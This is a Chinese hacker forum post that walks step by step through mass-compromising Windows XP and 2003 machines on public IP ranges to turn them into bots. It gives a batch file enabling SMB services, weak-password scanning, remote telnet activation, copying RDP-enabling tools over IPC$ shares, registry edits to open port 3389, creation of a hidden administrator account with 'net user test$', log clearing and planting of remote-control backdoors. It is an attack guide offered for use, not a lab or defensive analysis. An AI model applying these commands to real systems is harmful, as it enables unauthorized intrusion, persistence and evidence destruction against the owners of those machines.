好久不玩黑了,在网上看好多菜鸟在扫肉鸡,抱怨扫不到135 !现在都是自动扫描自动传马,到现在所学的东西都是自己Google加自己总结出来的,免杀做起来比较麻烦,学习中,从不DDOS别人,不充Q币不开会员,要那么多肉鸡也没什么用,×××也不是很感兴趣。得到肉鸡的方法很多,拿SHELL提权也可以得到很多,办公室上网,拿出啊D随便扫了下,三只服务器,N只XP。方法很简单:

1、本机关闭防火墙(net stop sharedaccess) 、关闭所有杀毒软件、关闭360***防火墙

2、开通本机几项服务,将以下代码保存为x.bat执行即可!

@echo off

color c

title 开启服务

echo.

echo 开始扫描前需要检测并开启以下服务,请稍等....

echo.

sc config LmHosts start= auto

sc config RpcLocator start= auto

sc config NtlmSsp start= auto

sc config lanmanserver start= auto

sc config SharedAccess start= disabled

net start LmHosts 2>nul

net start RpcLocator 2>nul

net start NtlmSsp 2>nul

net start lanmanserver 2>nul

net stop SharedAccess >nul 2>nul

echo.

echo 开启需要的服务成功完毕!

pause

3、设置啊D网络工具包:IP可以扫本机外网的IP段,(电信,铁通,联通都会有所不同,非电信扫电信的IP要用×××代理)线程及弱口令密码

发现弱口令的,点"远程开启Telnet"(如有出现错误,不明白的可以参见啊D主页说明),Telnet连接对方的51端口,

XP的,下面双开3389:

1、关闭防火墙(net stop sharedaccess)

2、开启3389(XP3389.exe)

3、termsrvhack.dll

4、3389.bat

具体如下:

telnet X.X.192.104 51

net share

如果只开了IPC$共享,那么执行 net share c$=c:

本机cmd 下执行:net use \\X.X.192.104\ipc$ "" /u:administrator提示成功

copy xp3389.exe \\X.X.192.104\c$

copy termsrvhack.dll \\X.X.192.104\c$

Telnet肉鸡cmd下执行:net stop sharedaccess 关闭防火墙 执行xp3389.exe 提示成功

本机cmd下执行 tasklist /s X.X.192.104 /u administrator /p /svc

查看DcomLaunch, TermService的PID值,假设为:2010

编辑本机3389.bat 把对应的PID值改为2010

本机执行copy 3389.bat \\X.X.192.104\c$

Telnet下执行3389.bat提示成功,再添加管理员就ok了

net user test$ /add&net localgroup administrators test$ /add

如果本机是外网IP的话,如果net use \\X.X.192.104\ipc$ "" /u:administrator提示不成功

可以telnet下执行 tasklist /svc >1.txt

本机执行net use \\X.X.192.104 \ipc$ "" /u:administrator然后 copy \\X.X.192.104\c$ \1.txt c:\

到本机C:盘下查看,

如果扫到的是2003服务器,可以直接telnet然后执行:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d /f(可以直接开启XP 2003 的3389)

然后直接用扫到的弱口令登录,克隆?员帐号,清除日志,留个SHIT后门或鸽子之类的远控也可以

如果执行以上代码连接不了3389可以Telnet下执行:

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber (查看端口,默认的是3389)如果不是3389 d3d,把查到的十六进制数据用科学计算器转换下就OK了!

三个文件,网上找!

刚开的这台,下线了

换一台